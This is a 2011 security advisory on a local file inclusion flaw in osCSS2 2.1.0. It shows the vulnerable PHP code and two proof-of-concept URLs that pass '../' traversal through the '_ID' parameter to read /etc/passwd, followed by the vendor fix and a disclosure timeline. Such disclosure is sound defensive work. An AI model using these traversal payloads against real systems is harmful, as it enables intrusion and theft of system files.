osCSS2 "_ID" parameter Local file inclusion



Advisory: osCSS2 "_ID" parameter Local file inclusion
Advisory ID: SSCHADV2011-034
Author: Stefan Schurtz
Affected Software: Successfully tested on osCSS2 2.1.0 (latest version)
Vendor URL: http://oscss.org/
Vendor Status: Fixed in svn branche 2.1.0 and reported in develop version 2.1.1

==========================
Vulnerability Description
==========================

osCSS2 2.1.0 "_ID" parameter is prone to a LFI vulnerability

==========================
Vulnerable code
==========================

//.htaccess
RewriteRule ^shopping_cart.php(.{0,})$ content.php?_ID=shopping_cart.php&%{QUERY_STRING}

//content.php
require($page->path_gabarit());

// includes/classes/page.php
public function pile_file_lang($path_file){
global $lang;
if(substr($path_file,0,strlen(DIR_FS_CATALOG)) !=DIR_FS_CATALOG) $path_file= DIR_FS_CATALOG.$path_file;

if(!in_array($path_file,(array)$this->PileFileLang))
include_once($path_file);
}

==================
PoC-Exploit
==================

http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd
http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd

=========
Solution
=========

Fixed in svn branche 2.1.0 and reported in develop version 2.1.1

====================
Disclosure Timeline
====================

08-Nov-2011 - informed vendor
08-Nov-2011 - release date of this security advisory
08-Nov-2011 - fixed by vendor

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://oscss.org/
http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html
http://dev.oscss.org/task/892
http://www.rul3z.de/advisories/SSCHADV2011-034.txt



Relevant Pages

  • [NT] ActiveSync Denial of Service Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... By "pretending" to be an iPAQ and connecting to TCP port 5679, ... sending a corrupted "I would like to sync with you" packet, ... Sample code to demonstrate the vulnerability is shown below: ...
    (Securiteam)
  • [Full-disclosure] Microsoft SQL Server 2005 sp_replwritetovarbin memory overwrite (update to SEC
    ... (Microsoft SQL Server sp_replwritetovarbin limited memory overwrite ... This vulnerability has been described in a prior security ... Our public security advisory has been updated accordingly: ... Remove the sp_replwriterovarbin extended stored procedure. ...
    (Full-Disclosure)
  • Re: MS09-032 Installation
    ... Security Advisory 953839, Microsoft Security Advisory 956391, Microsoft ... Vulnerability - CVE-2008-0015, as does the FixIt some had used before ... be a mistake to "undo" the workaround, ... What would happen if I install this update and then undo the ...
    (microsoft.public.security)
  • Microsoft SQL Server 2005 sp_replwritetovarbin memory overwrite (update to SEC Consult SA-200812
    ... (Microsoft SQL Server sp_replwritetovarbin limited memory overwrite ... This vulnerability has been described in a prior security ... Our public security advisory has been updated accordingly: ... Remove the sp_replwriterovarbin extended stored procedure. ...
    (Bugtraq)
  • WSPortal version 1.0 Path Disclosure Vulnerability
    ... WSPortal version 1.0 Path Disclosure Vulnerability ... WSPortal is a site management system coded in PHP/MySQL. ... There is no official fix at the release of this Security Advisory. ...
    (Bugtraq)